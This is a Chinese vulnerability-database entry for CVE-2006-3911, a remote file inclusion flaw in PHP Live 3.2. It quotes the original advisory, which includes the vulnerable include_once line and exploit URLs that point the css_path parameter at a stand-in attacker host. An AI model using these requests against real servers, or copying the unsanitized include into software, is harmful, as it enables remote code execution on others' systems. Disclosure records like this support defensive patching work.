PHP Live 'help.php和setup/header.php' css_path远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110666 漏洞类型 输入验证
发布时间 2006-07-23 更新时间 2006-09-22
CVE编号 CVE-2006-3911 CNNVD-ID CNNVD-200607-466
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2060
https://cxsecurity.com/issue/WLB-2006080006
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-466
|漏洞详情
PHPLive!是一种构架于PHP、MySQL之上的开源软件,为企业用户提供实时交谈服务。PHPLive!没有正确过滤对help.php和setup/header.php文件的css_path参数的输入,允许远程攻击者通过包含本地和外部资源导致执行任意PHP代码。漏洞代码如下:
|漏洞EXP
Advisory: PHPLive 3.2 Remote Injection Vulnerability
 Release Date: 2006/07/23
       Author: magnific
   Discovered: aneurysm.inc security reserach
         Risk: High
Vendor Status: not contacted | no patch available
  Vendor Site: www.osicodes.com
      Contact: aneurysm_inc[at]hotmail[dot]com
      Version: all

-----------
Overview:

Some variables are not properly sanitized before being used.
Here you will find the variables not properly sanitized:

-----------
Vulnerable code:

help.php /setup/header.php etc..

<? $css_path = ( !isset( $css_path ) ) ? $css_path = "./" : $css_path ; include_once( $css_path."css/default.php" ) ; ?>

-----------
Execution:

help.php?css_path=htt://attacker
setup/header.php?css_path=htt://attacker


-----------
Vendor:

At the moment, there are no solutions from the vendor. If you want to make
sure the code and your PHPLIVE you have to sanitize the variable $css_path,
in all files affecteds.
Active SAFE_MODE on server, for local security.

---------------------------
aneurysm.inc security reserach
irc.gigachat.net
#aneurysm.inc
---------------------------

# milw0rm.com [2006-07-23]
|参考资料

来源:BID
名称:19116
链接:http://www.securityfocus.com/bid/19116
来源:BUGTRAQ
名称:20060724PHPLive!v3.2(header.php)RemoteFileIncludeVulnerabilities
链接:http://www.securityfocus.com/archive/1/440955
来源:OSVDB
名称:27449
链接:http://www.osvdb.org/27449
来源:OSVDB
名称:27448
链接:http://www.osvdb.org/27448
来源:MILW0RM
名称:2060
链接:http://www.milw0rm.com/exploits/2060
来源:VUPEN
名称:ADV-2006-2940
链接:http://www.frsirt.com/english/advisories/2006/2940
来源:SECTRACK
名称:1016581
链接:http://securitytracker.com/id?1016581
来源:XF
名称:phplive-help-setupheader-file-include(27914)
链接:http://xforce.iss.net/xforce/xfdb/27914
来源:BUGTRAQ
名称:20061007PHPLive!<=3.1help.phpRemoteFileInclusionvulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/447947/100/200/threaded
来源:MISC
链接:http://www.neosecurityteam.net/index.php?action=advisories&id=25
来源:SECTRACK
名称:1017017
链接:http://securitytracker.com/id?1017017
来源:SREASON
名称:1297
链接:http://securityreason.com/securityalert/1297
来源:SECUNIA
名称:21158
链接:http://secunia.com/advisories/21158